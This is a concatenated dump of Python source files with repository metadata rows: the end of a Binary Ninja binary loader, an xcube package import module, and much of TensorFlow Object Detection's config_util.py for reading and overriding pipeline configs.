('cbus0', 0x7f0fff66),
('cbus1', 0x7f0fff68),
('cbus2', 0x7f0fff6a),
('vb', 0x7f0fff6c),
('ext7', 0x7f0fff6e),
('cbus3', 0x7f0fff70),
('rtc', 0x7f0fff72),
('60Hz', 0x7f0fff74),
('mouse', 0x7f0fff76),
('timer0', 0x7f0fff78),
('timer1', 0x7f0fff7a),
('serial_dma', 0x7f0fff7c),
('serial', 0x7f0fff7e),
('ethernet', 0x7f0fff80)]:
self.define_auto_symbol(Symbol(SymbolType.ImportedDataSymbol, address + 0, 'ioga_icr_' + name))
self.define_auto_symbol(Symbol(SymbolType.ImportedDataSymbol, address + 1, 'ioga_icr_' + name + '_ctrl'))
for name,address in [
('prescaler', 0x7f0fff88),
('timer0', 0x7f0fff8c),
('timer1', 0x7f0fff90)]:
self.define_auto_symbol(Symbol(SymbolType.ImportedDataSymbol, address, 'ioga_' + name))
return True
except:
log_error(traceback.format_exc())
return False
def perform_is_executable(self):
return True
def perform_get_length(self):
return sum(len(x[1]) for x in self.unpacked)
def perform_get_start(self):
return min(x[0] for x in self.unpacked)
def perform_read(self, addr, length):
unpacked_range = [x for x in self.unpacked if x[0] <= addr < x[0] + len(x[1]) and x[0] <= addr + length <= x[0] + len(x[1])]
if len(unpacked_range) == 1:
start_offset = addr - unpacked_range[0][0]
end_offset = start_offset + length
return unpacked_range[0][1][start_offset:end_offset]
else:
return ''
| 55.935484
| 279
| 0.570934
|
9664d2e1b8cc7b74c4a8d92978a0280e44aedb11
| 2,315
|
py
|
Python
|
xcube/core/gen2/__init__.py
|
bcdev/xcube
|
9d275ef3baef8fbcea5c1fbbfb84c3d0164aecd3
|
[
"MIT"
] | 97
|
2018-06-26T13:02:55.000Z
|
2022-03-26T21:03:13.000Z
|
xcube/core/gen2/__init__.py
|
bcdev/xcube
|
9d275ef3baef8fbcea5c1fbbfb84c3d0164aecd3
|
[
"MIT"
] | 524
|
2018-11-09T12:00:08.000Z
|
2022-03-31T17:00:13.000Z
|
xcube/core/gen2/__init__.py
|
bcdev/xcube
|
9d275ef3baef8fbcea5c1fbbfb84c3d0164aecd3
|
[
"MIT"
] | 15
|
2019-07-09T08:46:03.000Z
|
2022-02-07T18:47:34.000Z
|
# The MIT License (MIT)
# Copyright (c) 2021 by the xcube development team and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# noinspection PyUnresolvedReferences
from xcube.core.byoa import CodeConfig
# noinspection PyUnresolvedReferences
from xcube.core.byoa import FileSet
# noinspection PyUnresolvedReferences
from xcube.core.store.descriptor import DatasetDescriptor
from .config import CallbackConfig
from .config import CubeConfig
from .config import InputConfig
from .config import OutputConfig
from .error import CubeGeneratorError
from .generator import CubeGenerator
from .local.generator import LocalCubeGenerator
from .processor import DatasetProcessor
from .processor import METHOD_NAME_DATASET_PROCESSOR
from .processor import METHOD_NAME_PARAMS_SCHEMA_GETTER
from .remote.config import ServiceConfig
from .remote.config import ServiceConfigLike
from .remote.generator import RemoteCubeGenerator
from .remote.response import CostEstimation
from .remote.response import CubeInfoWithCosts
from .remote.response import CubeInfoWithCostsResult
from .request import CubeGeneratorRequest
from .request import CubeGeneratorRequestLike
from .response import CubeGeneratorResult
from .response import CubeInfo
from .response import CubeInfoResult
from .response import CubeReference
| 45.392157
| 81
| 0.825918
|
7e0ea010a22b6a48cc7ae681b1acf0aebdb6b391
| 52,607
|
py
|
Python
|
research/object_detection/utils/config_util.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
research/object_detection/utils/config_util.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
research/object_detection/utils/config_util.py
|
hjkim-haga/TF-OD-API
|
22ac477ff4dfb93fe7a32c94b5f0b1e74330902b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for reading and updating configuration files."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from google.protobuf import text_format
import tensorflow.compat.v1 as tf
from tensorflow.python.lib.io import file_io
from object_detection.protos import eval_pb2
from object_detection.protos import graph_rewriter_pb2
from object_detection.protos import input_reader_pb2
from object_detection.protos import model_pb2
from object_detection.protos import pipeline_pb2
from object_detection.protos import train_pb2
def get_image_resizer_config(model_config):
"""Returns the image resizer config from a model config.
Args:
model_config: A model_pb2.DetectionModel.
Returns:
An image_resizer_pb2.ImageResizer.
Raises:
ValueError: If the model type is not recognized.
"""
meta_architecture = model_config.WhichOneof("model")
meta_architecture_config = getattr(model_config, meta_architecture)
if hasattr(meta_architecture_config, "image_resizer"):
return getattr(meta_architecture_config, "image_resizer")
else:
raise ValueError("{} has no image_reszier_config".format(
meta_architecture))
def get_spatial_image_size(image_resizer_config):
"""Returns expected spatial size of the output image from a given config.
Args:
image_resizer_config: An image_resizer_pb2.ImageResizer.
Returns:
A list of two integers of the form [height, width]. `height` and `width` are
set -1 if they cannot be determined during graph construction.
Raises:
ValueError: If the model type is not recognized.
"""
if image_resizer_config.HasField("fixed_shape_resizer"):
return [
image_resizer_config.fixed_shape_resizer.height,
image_resizer_config.fixed_shape_resizer.width
]
if image_resizer_config.HasField("keep_aspect_ratio_resizer"):
if image_resizer_config.keep_aspect_ratio_resizer.pad_to_max_dimension:
return [image_resizer_config.keep_aspect_ratio_resizer.max_dimension] * 2
else:
return [-1, -1]
if image_resizer_config.HasField(
"identity_resizer") or image_resizer_config.HasField(
"conditional_shape_resizer"):
return [-1, -1]
raise ValueError("Unknown image resizer type.")
def get_max_num_context_features(model_config):
"""Returns maximum number of context features from a given config.
Args:
model_config: A model config file.
Returns:
An integer specifying the max number of context features if the model
config contains context_config, None otherwise
"""
meta_architecture = model_config.WhichOneof("model")
meta_architecture_config = getattr(model_config, meta_architecture)
if hasattr(meta_architecture_config, "context_config"):
return meta_architecture_config.context_config.max_num_context_features
def get_context_feature_length(model_config):
"""Returns context feature length from a given config.
Args:
model_config: A model config file.
Returns:
An integer specifying the fixed length of each feature in context_features.
"""
meta_architecture = model_config.WhichOneof("model")
meta_architecture_config = getattr(model_config, meta_architecture)
if hasattr(meta_architecture_config, "context_config"):
return meta_architecture_config.context_config.context_feature_length
def get_configs_from_pipeline_file(pipeline_config_path, config_override=None):
"""Reads config from a file containing pipeline_pb2.TrainEvalPipelineConfig.
Args:
pipeline_config_path: Path to pipeline_pb2.TrainEvalPipelineConfig text
proto.
config_override: A pipeline_pb2.TrainEvalPipelineConfig text proto to
override pipeline_config_path.
Returns:
Dictionary of configuration objects. Keys are `model`, `train_config`,
`train_input_config`, `eval_config`, `eval_input_config`. Value are the
corresponding config objects.
"""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
with tf.gfile.GFile(pipeline_config_path, "r") as f:
proto_str = f.read()
text_format.Merge(proto_str, pipeline_config)
if config_override:
text_format.Merge(config_override, pipeline_config)
return create_configs_from_pipeline_proto(pipeline_config)
def clear_fine_tune_checkpoint(pipeline_config_path,
new_pipeline_config_path):
"""Clears fine_tune_checkpoint and writes a new pipeline config file."""
configs = get_configs_from_pipeline_file(pipeline_config_path)
configs["train_config"].fine_tune_checkpoint = ""
configs["train_config"].load_all_detection_checkpoint_vars = False
pipeline_proto = create_pipeline_proto_from_configs(configs)
with tf.gfile.Open(new_pipeline_config_path, "wb") as f:
f.write(text_format.MessageToString(pipeline_proto))
def update_fine_tune_checkpoint_type(train_config):
"""Set `fine_tune_checkpoint_type` using `from_detection_checkpoint`.
`train_config.from_detection_checkpoint` field is deprecated. For backward
compatibility, this function sets `train_config.fine_tune_checkpoint_type`
based on `train_config.from_detection_checkpoint`.
Args:
train_config: train_pb2.TrainConfig proto object.
"""
if not train_config.fine_tune_checkpoint_type:
if train_config.from_detection_checkpoint:
train_config.fine_tune_checkpoint_type = "detection"
else:
train_config.fine_tune_checkpoint_type = "classification"
def create_configs_from_pipeline_proto(pipeline_config):
"""Creates a configs dictionary from pipeline_pb2.TrainEvalPipelineConfig.
Args:
pipeline_config: pipeline_pb2.TrainEvalPipelineConfig proto object.
Returns:
Dictionary of configuration objects. Keys are `model`, `train_config`,
`train_input_config`, `eval_config`, `eval_input_configs`. Value are
the corresponding config objects or list of config objects (only for
eval_input_configs).
"""
configs = {}
configs["model"] = pipeline_config.model
configs["train_config"] = pipeline_config.train_config
configs["train_input_config"] = pipeline_config.train_input_reader
configs["eval_config"] = pipeline_config.eval_config
configs["eval_input_configs"] = pipeline_config.eval_input_reader
# Keeps eval_input_config only for backwards compatibility. All clients should
# read eval_input_configs instead.
if configs["eval_input_configs"]:
configs["eval_input_config"] = configs["eval_input_configs"][0]
if pipeline_config.HasField("graph_rewriter"):
configs["graph_rewriter_config"] = pipeline_config.graph_rewriter
return configs
def get_graph_rewriter_config_from_file(graph_rewriter_config_file):
"""Parses config for graph rewriter.
Args:
graph_rewriter_config_file: file path to the graph rewriter config.
Returns:
graph_rewriter_pb2.GraphRewriter proto
"""
graph_rewriter_config = graph_rewriter_pb2.GraphRewriter()
with tf.gfile.GFile(graph_rewriter_config_file, "r") as f:
text_format.Merge(f.read(), graph_rewriter_config)
return graph_rewriter_config
def create_pipeline_proto_from_configs(configs):
"""Creates a pipeline_pb2.TrainEvalPipelineConfig from configs dictionary.
This function performs the inverse operation of
create_configs_from_pipeline_proto().
Args:
configs: Dictionary of configs. See get_configs_from_pipeline_file().
Returns:
A fully populated pipeline_pb2.TrainEvalPipelineConfig.
"""
pipeline_config = pipeline_pb2.TrainEvalPipelineConfig()
pipeline_config.model.CopyFrom(configs["model"])
pipeline_config.train_config.CopyFrom(configs["train_config"])
pipeline_config.train_input_reader.CopyFrom(configs["train_input_config"])
pipeline_config.eval_config.CopyFrom(configs["eval_config"])
pipeline_config.eval_input_reader.extend(configs["eval_input_configs"])
if "graph_rewriter_config" in configs:
pipeline_config.graph_rewriter.CopyFrom(configs["graph_rewriter_config"])
return pipeline_config
def save_pipeline_config(pipeline_config, directory):
"""Saves a pipeline config text file to disk.
Args:
pipeline_config: A pipeline_pb2.TrainEvalPipelineConfig.
directory: The model directory into which the pipeline config file will be
saved.
"""
if not file_io.file_exists(directory):
file_io.recursive_create_dir(directory)
pipeline_config_path = os.path.join(directory, "pipeline.config")
config_text = text_format.MessageToString(pipeline_config)
with tf.gfile.Open(pipeline_config_path, "wb") as f:
tf.logging.info("Writing pipeline config file to %s",
pipeline_config_path)
f.write(config_text)
def get_configs_from_multiple_files(model_config_path="",
train_config_path="",
train_input_config_path="",
eval_config_path="",
eval_input_config_path="",
graph_rewriter_config_path=""):
"""Reads training configuration from multiple config files.
Args:
model_config_path: Path to model_pb2.DetectionModel.
train_config_path: Path to train_pb2.TrainConfig.
train_input_config_path: Path to input_reader_pb2.InputReader.
eval_config_path: Path to eval_pb2.EvalConfig.
eval_input_config_path: Path to input_reader_pb2.InputReader.
graph_rewriter_config_path: Path to graph_rewriter_pb2.GraphRewriter.
Returns:
Dictionary of configuration objects. Keys are `model`, `train_config`,
`train_input_config`, `eval_config`, `eval_input_config`. Key/Values are
returned only for valid (non-empty) strings.
"""
configs = {}
if model_config_path:
model_config = model_pb2.DetectionModel()
with tf.gfile.GFile(model_config_path, "r") as f:
text_format.Merge(f.read(), model_config)
configs["model"] = model_config
if train_config_path:
train_config = train_pb2.TrainConfig()
with tf.gfile.GFile(train_config_path, "r") as f:
text_format.Merge(f.read(), train_config)
configs["train_config"] = train_config
if train_input_config_path:
train_input_config = input_reader_pb2.InputReader()
with tf.gfile.GFile(train_input_config_path, "r") as f:
text_format.Merge(f.read(), train_input_config)
configs["train_input_config"] = train_input_config
if eval_config_path:
eval_config = eval_pb2.EvalConfig()
with tf.gfile.GFile(eval_config_path, "r") as f:
text_format.Merge(f.read(), eval_config)
configs["eval_config"] = eval_config
if eval_input_config_path:
eval_input_config = input_reader_pb2.InputReader()
with tf.gfile.GFile(eval_input_config_path, "r") as f:
text_format.Merge(f.read(), eval_input_config)
configs["eval_input_configs"] = [eval_input_config]
if graph_rewriter_config_path:
configs["graph_rewriter_config"] = get_graph_rewriter_config_from_file(
graph_rewriter_config_path)
return configs
def get_number_of_classes(model_config):
"""Returns the number of classes for a detection model.
Args:
model_config: A model_pb2.DetectionModel.
Returns:
Number of classes.
Raises:
ValueError: If the model type is not recognized.
"""
meta_architecture = model_config.WhichOneof("model")
meta_architecture_config = getattr(model_config, meta_architecture)
if hasattr(meta_architecture_config, "num_classes"):
return meta_architecture_config.num_classes
else:
raise ValueError("{} does not have num_classes.".format(meta_architecture))
def get_optimizer_type(train_config):
"""Returns the optimizer type for training.
Args:
train_config: A train_pb2.TrainConfig.
Returns:
The type of the optimizer
"""
return train_config.optimizer.WhichOneof("optimizer")
def get_learning_rate_type(optimizer_config):
"""Returns the learning rate type for training.
Args:
optimizer_config: An optimizer_pb2.Optimizer.
Returns:
The type of the learning rate.
"""
return optimizer_config.learning_rate.WhichOneof("learning_rate")
def _is_generic_key(key):
"""Determines whether the key starts with a generic config dictionary key."""
for prefix in [
"graph_rewriter_config",
"model",
"train_input_config",
"train_config",
"eval_config"]:
if key.startswith(prefix + "."):
return True
return False
def _check_and_convert_legacy_input_config_key(key):
"""Checks key and converts legacy input config update to specific update.
Args:
key: string indicates the target of update operation.
Returns:
is_valid_input_config_key: A boolean indicating whether the input key is to
update input config(s).
key_name: 'eval_input_configs' or 'train_input_config' string if
is_valid_input_config_key is true. None if is_valid_input_config_key is
false.
input_name: always returns None since legacy input config key never
specifies the target input config. Keeping this output only to match the
output form defined for input config update.
field_name: the field name in input config. `key` itself if
is_valid_input_config_key is false.
"""
key_name = None
input_name = None
field_name = key
is_valid_input_config_key = True
if field_name == "train_shuffle":
key_name = "train_input_config"
field_name = "shuffle"
elif field_name == "eval_shuffle":
key_name = "eval_input_configs"
field_name = "shuffle"
elif field_name == "train_input_path":
key_name = "train_input_config"
field_name = "input_path"
elif field_name == "eval_input_path":
key_name = "eval_input_configs"
field_name = "input_path"
elif field_name == "append_train_input_path":
key_name = "train_input_config"
field_name = "input_path"
elif field_name == "append_eval_input_path":
key_name = "eval_input_configs"
field_name = "input_path"
else:
is_valid_input_config_key = False
return is_valid_input_config_key, key_name, input_name, field_name
def check_and_parse_input_config_key(configs, key):
"""Checks key and returns specific fields if key is valid input config update.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
key: string indicates the target of update operation.
Returns:
is_valid_input_config_key: A boolean indicate whether the input key is to
update input config(s).
key_name: 'eval_input_configs' or 'train_input_config' string if
is_valid_input_config_key is true. None if is_valid_input_config_key is
false.
input_name: the name of the input config to be updated. None if
is_valid_input_config_key is false.
field_name: the field name in input config. `key` itself if
is_valid_input_config_key is false.
Raises:
ValueError: when the input key format doesn't match any known formats.
ValueError: if key_name doesn't match 'eval_input_configs' or
'train_input_config'.
ValueError: if input_name doesn't match any name in train or eval input
configs.
ValueError: if field_name doesn't match any supported fields.
"""
key_name = None
input_name = None
field_name = None
fields = key.split(":")
if len(fields) == 1:
field_name = key
return _check_and_convert_legacy_input_config_key(key)
elif len(fields) == 3:
key_name = fields[0]
input_name = fields[1]
field_name = fields[2]
else:
raise ValueError("Invalid key format when overriding configs.")
# Checks if key_name is valid for specific update.
if key_name not in ["eval_input_configs", "train_input_config"]:
raise ValueError("Invalid key_name when overriding input config.")
# Checks if input_name is valid for specific update. For train input config it
# should match configs[key_name].name, for eval input configs it should match
# the name field of one of the eval_input_configs.
if isinstance(configs[key_name], input_reader_pb2.InputReader):
is_valid_input_name = configs[key_name].name == input_name
else:
is_valid_input_name = input_name in [
eval_input_config.name for eval_input_config in configs[key_name]
]
if not is_valid_input_name:
raise ValueError("Invalid input_name when overriding input config.")
# Checks if field_name is valid for specific update.
if field_name not in [
"input_path", "label_map_path", "shuffle", "mask_type",
"sample_1_of_n_examples"
]:
raise ValueError("Invalid field_name when overriding input config.")
return True, key_name, input_name, field_name
def merge_external_params_with_configs(configs, hparams=None, kwargs_dict=None):
"""Updates `configs` dictionary based on supplied parameters.
This utility is for modifying specific fields in the object detection configs.
Say that one would like to experiment with different learning rates, momentum
values, or batch sizes. Rather than creating a new config text file for each
experiment, one can use a single base config file, and update particular
values.
There are two types of field overrides:
1. Strategy-based overrides, which update multiple relevant configuration
options. For example, updating `learning_rate` will update both the warmup and
final learning rates.
In this case key can be one of the following formats:
1. legacy update: single string that indicates the attribute to be
updated. E.g. 'label_map_path', 'eval_input_path', 'shuffle'.
Note that when updating fields (e.g. eval_input_path, eval_shuffle) in
eval_input_configs, the override will only be applied when
eval_input_configs has exactly 1 element.
2. specific update: colon separated string that indicates which field in
which input_config to update. It should have 3 fields:
- key_name: Name of the input config we should update, either
'train_input_config' or 'eval_input_configs'
- input_name: a 'name' that can be used to identify elements, especially
when configs[key_name] is a repeated field.
- field_name: name of the field that you want to override.
For example, given configs dict as below:
configs = {
'model': {...}
'train_config': {...}
'train_input_config': {...}
'eval_config': {...}
'eval_input_configs': [{ name:"eval_coco", ...},
{ name:"eval_voc", ... }]
}
Assume we want to update the input_path of the eval_input_config
whose name is 'eval_coco'. The `key` would then be:
'eval_input_configs:eval_coco:input_path'
2. Generic key/value, which update a specific parameter based on namespaced
configuration keys. For example,
`model.ssd.loss.hard_example_miner.max_negatives_per_positive` will update the
hard example miner configuration for an SSD model config. Generic overrides
are automatically detected based on the namespaced keys.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
hparams: A `HParams`.
kwargs_dict: Extra keyword arguments that are treated the same way as
attribute/value pairs in `hparams`. Note that hyperparameters with the
same names will override keyword arguments.
Returns:
`configs` dictionary.
Raises:
ValueError: when the key string doesn't match any of its allowed formats.
"""
if kwargs_dict is None:
kwargs_dict = {}
if hparams:
kwargs_dict.update(hparams.values())
for key, value in kwargs_dict.items():
tf.logging.info("Maybe overwriting %s: %s", key, value)
# pylint: disable=g-explicit-bool-comparison
if value == "" or value is None:
continue
# pylint: enable=g-explicit-bool-comparison
elif _maybe_update_config_with_key_value(configs, key, value):
continue
elif _is_generic_key(key):
_update_generic(configs, key, value)
else:
tf.logging.info("Ignoring config override key: %s", key)
return configs
def _maybe_update_config_with_key_value(configs, key, value):
"""Checks key type and updates `configs` with the key value pair accordingly.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
key: String indicates the field(s) to be updated.
value: Value used to override existing field value.
Returns:
A boolean value that indicates whether the override succeeds.
Raises:
ValueError: when the key string doesn't match any of the formats above.
"""
is_valid_input_config_key, key_name, input_name, field_name = (
check_and_parse_input_config_key(configs, key))
if is_valid_input_config_key:
update_input_reader_config(
configs,
key_name=key_name,
input_name=input_name,
field_name=field_name,
value=value)
elif field_name == "learning_rate":
_update_initial_learning_rate(configs, value)
elif field_name == "batch_size":
_update_batch_size(configs, value)
elif field_name == "momentum_optimizer_value":
_update_momentum_optimizer_value(configs, value)
elif field_name == "classification_localization_weight_ratio":
# Localization weight is fixed to 1.0.
_update_classification_localization_weight_ratio(configs, value)
elif field_name == "focal_loss_gamma":
_update_focal_loss_gamma(configs, value)
elif field_name == "focal_loss_alpha":
_update_focal_loss_alpha(configs, value)
elif field_name == "train_steps":
_update_train_steps(configs, value)
elif field_name == "label_map_path":
_update_label_map_path(configs, value)
elif field_name == "mask_type":
_update_mask_type(configs, value)
elif field_name == "sample_1_of_n_eval_examples":
_update_all_eval_input_configs(configs, "sample_1_of_n_examples", value)
elif field_name == "eval_num_epochs":
_update_all_eval_input_configs(configs, "num_epochs", value)
elif field_name == "eval_with_moving_averages":
_update_use_moving_averages(configs, value)
elif field_name == "retain_original_images_in_eval":
_update_retain_original_images(configs["eval_config"], value)
elif field_name == "use_bfloat16":
_update_use_bfloat16(configs, value)
elif field_name == "retain_original_image_additional_channels_in_eval":
_update_retain_original_image_additional_channels(configs["eval_config"],
value)
elif field_name == "num_classes":
_update_num_classes(configs["model"], value)
elif field_name == "sample_from_datasets_weights":
_update_sample_from_datasets_weights(configs["train_input_config"], value)
elif field_name == "peak_max_pool_kernel_size":
_update_peak_max_pool_kernel_size(configs["model"], value)
elif field_name == "candidate_search_scale":
_update_candidate_search_scale(configs["model"], value)
elif field_name == "candidate_ranking_mode":
_update_candidate_ranking_mode(configs["model"], value)
elif field_name == "score_distance_offset":
_update_score_distance_offset(configs["model"], value)
elif field_name == "box_scale":
_update_box_scale(configs["model"], value)
elif field_name == "keypoint_candidate_score_threshold":
_update_keypoint_candidate_score_threshold(configs["model"], value)
elif field_name == "rescore_instances":
_update_rescore_instances(configs["model"], value)
elif field_name == "unmatched_keypoint_score":
_update_unmatched_keypoint_score(configs["model"], value)
elif field_name == "score_distance_multiplier":
_update_score_distance_multiplier(configs["model"], value)
elif field_name == "std_dev_multiplier":
_update_std_dev_multiplier(configs["model"], value)
elif field_name == "rescoring_threshold":
_update_rescoring_threshold(configs["model"], value)
else:
return False
return True
def _update_tf_record_input_path(input_config, input_path):
"""Updates input configuration to reflect a new input path.
The input_config object is updated in place, and hence not returned.
Args:
input_config: A input_reader_pb2.InputReader.
input_path: A path to data or list of paths.
Raises:
TypeError: if input reader type is not `tf_record_input_reader`.
"""
input_reader_type = input_config.WhichOneof("input_reader")
if input_reader_type == "tf_record_input_reader":
input_config.tf_record_input_reader.ClearField("input_path")
if isinstance(input_path, list):
input_config.tf_record_input_reader.input_path.extend(input_path)
else:
input_config.tf_record_input_reader.input_path.append(input_path)
else:
raise TypeError("Input reader type must be `tf_record_input_reader`.")
def update_input_reader_config(configs,
key_name=None,
input_name=None,
field_name=None,
value=None,
path_updater=_update_tf_record_input_path):
"""Updates specified input reader config field.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
key_name: Name of the input config we should update, either
'train_input_config' or 'eval_input_configs'
input_name: String name used to identify input config to update with. Should
be either None or value of the 'name' field in one of the input reader
configs.
field_name: Field name in input_reader_pb2.InputReader.
value: Value used to override existing field value.
path_updater: helper function used to update the input path. Only used when
field_name is "input_path".
Raises:
ValueError: when input field_name is None.
ValueError: when input_name is None and number of eval_input_readers does
not equal to 1.
"""
if isinstance(configs[key_name], input_reader_pb2.InputReader):
# Updates singular input_config object.
target_input_config = configs[key_name]
if field_name == "input_path":
path_updater(input_config=target_input_config, input_path=value)
else:
setattr(target_input_config, field_name, value)
elif input_name is None and len(configs[key_name]) == 1:
# Updates first (and the only) object of input_config list.
target_input_config = configs[key_name][0]
if field_name == "input_path":
path_updater(input_config=target_input_config, input_path=value)
else:
setattr(target_input_config, field_name, value)
elif input_name is not None and len(configs[key_name]):
# Updates input_config whose name matches input_name.
update_count = 0
for input_config in configs[key_name]:
if input_config.name == input_name:
setattr(input_config, field_name, value)
update_count = update_count + 1
if not update_count:
raise ValueError(
"Input name {} not found when overriding.".format(input_name))
elif update_count > 1:
raise ValueError("Duplicate input name found when overriding.")
else:
key_name = "None" if key_name is None else key_name
input_name = "None" if input_name is None else input_name
field_name = "None" if field_name is None else field_name
raise ValueError("Unknown input config overriding: "
"key_name:{}, input_name:{}, field_name:{}.".format(
key_name, input_name, field_name))
def _update_initial_learning_rate(configs, learning_rate):
"""Updates `configs` to reflect the new initial learning rate.
This function updates the initial learning rate. For learning rate schedules,
all other defined learning rates in the pipeline config are scaled to maintain
their same ratio with the initial learning rate.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
learning_rate: Initial learning rate for optimizer.
Raises:
TypeError: if optimizer type is not supported, or if learning rate type is
not supported.
"""
optimizer_type = get_optimizer_type(configs["train_config"])
if optimizer_type == "rms_prop_optimizer":
optimizer_config = configs["train_config"].optimizer.rms_prop_optimizer
elif optimizer_type == "momentum_optimizer":
optimizer_config = configs["train_config"].optimizer.momentum_optimizer
elif optimizer_type == "adam_optimizer":
optimizer_config = configs["train_config"].optimizer.adam_optimizer
else:
raise TypeError("Optimizer %s is not supported." % optimizer_type)
learning_rate_type = get_learning_rate_type(optimizer_config)
if learning_rate_type == "constant_learning_rate":
constant_lr = optimizer_config.learning_rate.constant_learning_rate
constant_lr.learning_rate = learning_rate
elif learning_rate_type == "exponential_decay_learning_rate":
exponential_lr = (
optimizer_config.learning_rate.exponential_decay_learning_rate)
exponential_lr.initial_learning_rate = learning_rate
elif learning_rate_type == "manual_step_learning_rate":
manual_lr = optimizer_config.learning_rate.manual_step_learning_rate
original_learning_rate = manual_lr.initial_learning_rate
learning_rate_scaling = float(learning_rate) / original_learning_rate
manual_lr.initial_learning_rate = learning_rate
for schedule in manual_lr.schedule:
schedule.learning_rate *= learning_rate_scaling
elif learning_rate_type == "cosine_decay_learning_rate":
cosine_lr = optimizer_config.learning_rate.cosine_decay_learning_rate
learning_rate_base = cosine_lr.learning_rate_base
warmup_learning_rate = cosine_lr.warmup_learning_rate
warmup_scale_factor = warmup_learning_rate / learning_rate_base
cosine_lr.learning_rate_base = learning_rate
cosine_lr.warmup_learning_rate = warmup_scale_factor * learning_rate
else:
raise TypeError("Learning rate %s is not supported." % learning_rate_type)
def _update_batch_size(configs, batch_size):
"""Updates `configs` to reflect the new training batch size.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
batch_size: Batch size to use for training (Ideally a power of 2). Inputs
are rounded, and capped to be 1 or greater.
"""
configs["train_config"].batch_size = max(1, int(round(batch_size)))
def _validate_message_has_field(message, field):
if not message.HasField(field):
raise ValueError("Expecting message to have field %s" % field)
def _update_generic(configs, key, value):
"""Update a pipeline configuration parameter based on a generic key/value.
Args:
configs: Dictionary of pipeline configuration protos.
key: A string key, dot-delimited to represent the argument key.
e.g. "model.ssd.train_config.batch_size"
value: A value to set the argument to. The type of the value must match the
type for the protocol buffer. Note that setting the wrong type will
result in a TypeError.
e.g. 42
Raises:
ValueError if the message key does not match the existing proto fields.
TypeError the value type doesn't match the protobuf field type.
"""
fields = key.split(".")
first_field = fields.pop(0)
last_field = fields.pop()
message = configs[first_field]
for field in fields:
_validate_message_has_field(message, field)
message = getattr(message, field)
_validate_message_has_field(message, last_field)
setattr(message, last_field, value)
def _update_momentum_optimizer_value(configs, momentum):
"""Updates `configs` to reflect the new momentum value.
Momentum is only supported for RMSPropOptimizer and MomentumOptimizer. For any
other optimizer, no changes take place. The configs dictionary is updated in
place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
momentum: New momentum value. Values are clipped at 0.0 and 1.0.
Raises:
TypeError: If the optimizer type is not `rms_prop_optimizer` or
`momentum_optimizer`.
"""
optimizer_type = get_optimizer_type(configs["train_config"])
if optimizer_type == "rms_prop_optimizer":
optimizer_config = configs["train_config"].optimizer.rms_prop_optimizer
elif optimizer_type == "momentum_optimizer":
optimizer_config = configs["train_config"].optimizer.momentum_optimizer
else:
raise TypeError("Optimizer type must be one of `rms_prop_optimizer` or "
"`momentum_optimizer`.")
optimizer_config.momentum_optimizer_value = min(max(0.0, momentum), 1.0)
def _update_classification_localization_weight_ratio(configs, ratio):
"""Updates the classification/localization weight loss ratio.
Detection models usually define a loss weight for both classification and
objectness. This function updates the weights such that the ratio between
classification weight to localization weight is the ratio provided.
Arbitrarily, localization weight is set to 1.0.
Note that in the case of Faster R-CNN, this same ratio is applied to the first
stage objectness loss weight relative to localization loss weight.
The configs dictionary is updated in place, and hence not returned.
Args:
configs: Dictionary of configuration objects. See outputs from
get_configs_from_pipeline_file() or get_configs_from_multiple_files().
ratio: Desired ratio of classification (and/or objectness) loss weight to
localization loss weight.
"""
meta_architecture = configs["model"].WhichOneof("model")
if meta_architecture == "faster_rcnn":
model = configs["model"].faster_rcnn
model.first_stage_localization_loss_weight = 1.0
model.first_stage_objectness_loss_weight = ratio
model.second_stage_localization_loss_weight = 1.0
model.second_stage_classification_loss_weight = ratio
if meta_architecture == "ssd":
model = configs["model"].ssd
model.loss.localization_weight = 1.0
model.loss.classification_weight = ratio
def _get_classification_loss(model_config):
"""Returns the classification loss for a model."""
meta_architecture = model_config.WhichOneof("model")
if meta_architecture == "faster_rcnn":
